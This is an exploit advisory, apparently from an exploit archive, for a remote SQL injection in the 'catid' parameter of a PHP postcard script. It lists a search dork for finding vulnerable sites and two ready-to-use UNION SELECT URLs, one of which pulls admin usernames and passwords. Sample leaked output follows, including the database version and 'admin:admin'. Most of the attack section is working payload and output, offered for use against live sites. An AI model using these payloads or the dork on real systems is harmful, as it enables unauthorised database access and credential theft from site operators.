37 lines
No EOL
1,018 B
Text
37 lines
No EOL
1,018 B
Text
post Card ( catid ) Remote SQL Injection Vulnerability
|
|
___________________________________
|
|
|
|
Author: Hussin X
|
|
|
|
Home : www.iqs3cur1ty.com<http://www.iqs3cur1ty.com> & www.iq-ty.com<http://www.iq-ty.com>
|
|
|
|
MaiL : darkangeL_G85@Yahoo.CoM
|
|
___________________________________
|
|
|
|
script : http://webbdomain.com/php/postcarden/index2.php
|
|
script : http://webbdomain.com/php/postcardir/index2.php
|
|
version : all
|
|
DorK : inurl:choosecard.php?catid=
|
|
_____
|
|
|
|
ExploiT & Demo
|
|
_______
|
|
|
|
|
|
version :
|
|
|
|
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin--
|
|
|
|
user & pass :
|
|
|
|
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin--
|
|
|
|
|
|
|
|
Note : Exploit in Source page
|
|
|
|
Example :
|
|
|
|
<td><a style="text-decoration:none" href='chosencard.php?id=5.0.89-community // << version :D
|
|
|
|
<td><a style="text-decoration:none" href='chosencard.php?id=admin:admin' // << here user and pass |